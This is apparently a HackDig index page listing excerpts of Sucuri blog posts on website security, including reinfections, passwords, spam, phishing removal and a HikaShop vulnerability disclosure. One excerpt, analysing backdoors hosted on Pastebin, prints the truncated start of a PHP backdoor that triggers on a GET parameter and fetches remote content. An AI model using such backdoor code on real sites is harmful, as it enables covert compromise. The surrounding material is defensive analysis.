HackDig : Dig high-quality web security articles for hackers

Security for Life: Promoting the Development of a Security Professional

This week marks the fifth and final week of National Cyber Security Awareness Month (NCSAM) 2015. A program sponsored by the Department of Homeland Security (DHS) in cooperation with the National Cyber Security Alliance and the Multi-State Information Sharing and Analysis Center, NCSAM emphasizes our shared responsibility in strengthening the cyber security
Publish At:2015-10-30 08:40 | Read:3462 | Comments:0 | Tags:Featured Articles Security Awareness development Learn Mento

Why Website Reinfections Happen

I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that regardless of you are you must always know the foundation that makes this company work. After a
Publish At:2015-03-24 12:50 | Read:4506 | Comments:0 | Tags:Learn Website Security bad habits best practices reinfection

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failing each other, we are not setting ou
Publish At:2015-03-19 20:50 | Read:4329 | Comments:0 | Tags:Learn Website Hacked Website Security

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failing each other, we are not setting our
Publish At:2015-03-19 14:35 | Read:3687 | Comments:0 | Tags:Learn Website Hacked Website Security

Why Websites Get Hacked

I spend a good amount of time engaging with website owners across a broad spectrum of businesses. Interestingly enough, unless I’m talking large enterprise, there is a common question that often comes up: Why would anyone ever hack my website? Depending on who you are, the answer to this can vary. Nonetheless, it often revolves around a few very finite exp
Publish At:2015-02-26 14:40 | Read:6484 | Comments:0 | Tags:Ask Sucuri Learn Website Security

The Dynamics of Passwords

How often do you think about the passwords you’re using? Not only for your website, but also for everything else you do on the internet on a daily basis? Are you re-using any of the same passwords to make it easier to remember them? We see it all too often: weak passwords used for FTP, database configuration, cPanel, and CMS logins. Everyone has their own
Publish At:2015-02-14 03:05 | Read:4763 | Comments:0 | Tags:Learn Website Security brute force firewall passwords

Creative Evasion Technique Against Website Firewalls

During one of our recent in-house Capture The Flag (CTF) events, I was playing with the idea of what could be done with Non-Breaking Spaces. I really wanted to win and surely there had to be a way through the existing evasion controls. This post is going to be a bit code-heavy for most end-users, but if you choose to read you’re bound to find it very
Publish At:2015-02-03 11:00 | Read:5320 | Comments:0 | Tags:Learn vulnerability Website Security encoding url

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files. Here’s the backdoor code: if(array_keys($_GET)[0] == 'up'){ $content = file_get_contents("
Publish At:2015-01-06 22:25 | Read:7184 | Comments:0 | Tags:Learn Website Attacks Website Hacked Website Security backdo

Malvertising on a Website Without Ads

When you first configure your website, whether it be WordPress, Joomla, Drupal, or any other flavor of the month, it is often in its purest state. Unless ofcourse the server was previously compromised, which in it of itself is another conversation outright. Barring that one instance, the new website should not exhibit any malicious behavior. Or so you would
Publish At:2014-12-12 12:25 | Read:5323 | Comments:0 | Tags:Learn Website Attacks Website Security brute force counter J

IIS, Compromised GoDaddy Servers, and Cyber Monday Spam

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see these patterns, I try to dig deeper and figure out what else those websites have in common. This time I revealed quite a few GoDaddy Windows servers have been pwned
Publish At:2014-12-08 07:40 | Read:4644 | Comments:1 | Tags:Learn Webserver Infections Website Spam Cyber Monday godaddy

Leveraging the WordPress Platform for SPAM

We’ve all seen WordPress comment and pingback spam, but thanks to strict moderation regimes and brilliant WordPress plugins that focus strictly on SPAM comments, comment spam isn’t a major problem for most websites these days. I have seen however, a new trend starting to emerge when it comes to spam involving WordPress. In recent years WordPress has become
Publish At:2014-12-05 18:25 | Read:4006 | Comments:0 | Tags:Learn Website Spam WordPress Security hijacking

Typos Can have a Bigger Impact Than Expected

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that? You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the int
Publish At:2014-11-26 11:55 | Read:3187 | Comments:0 | Tags:Learn Website Security JavaScript typo

Protecting Against Unknown Software Vulnerabilities

Bugs exist in every piece of code. It is suggested that for every 1,000 lines of code, there are on average 1 to 5 bugs to be found. Some of these bugs can have a security implications, these are known as vulnerabilities. These vulnerabilities can be used to exploit and compromise your server, your site and your users. As long as there are people involved i
Publish At:2014-11-24 12:10 | Read:5271 | Comments:0 | Tags:Learn Website Firewall Website Security wordpress

Website Malware Removal: Phishing

As we continue on our Malware Removal series we turn our attention to the increasing threat of Phishing infections. Just like a fisherman casts and reels with his fishing rod, a “phisher-man” will try their luck baiting users with fake pages, often in the form of login pages. These copied website pages are cast into infected websites with the ho
Publish At:2014-11-21 16:35 | Read:3908 | Comments:0 | Tags:Learn Website Malware Website Security phishing prevention v

Deep Dive into the HikaShop Vulnerability

It’s been two months since our disclosure of an Object Injection vulnerability affecting versions <2.3.3 of the Joomla! Hikashop extension. The vulnerability allowed an attacker to execute malicious code on a target website. How Does Object Injection Work? Object Injection occurs when raw user input is passed to an unserialize() function call. When this h
Publish At:2014-11-17 11:50 | Read:6637 | Comments:1 | Tags:Learn Vulnerability Disclosure hikashop Joomla! Security vul

Tools

Tag Cloud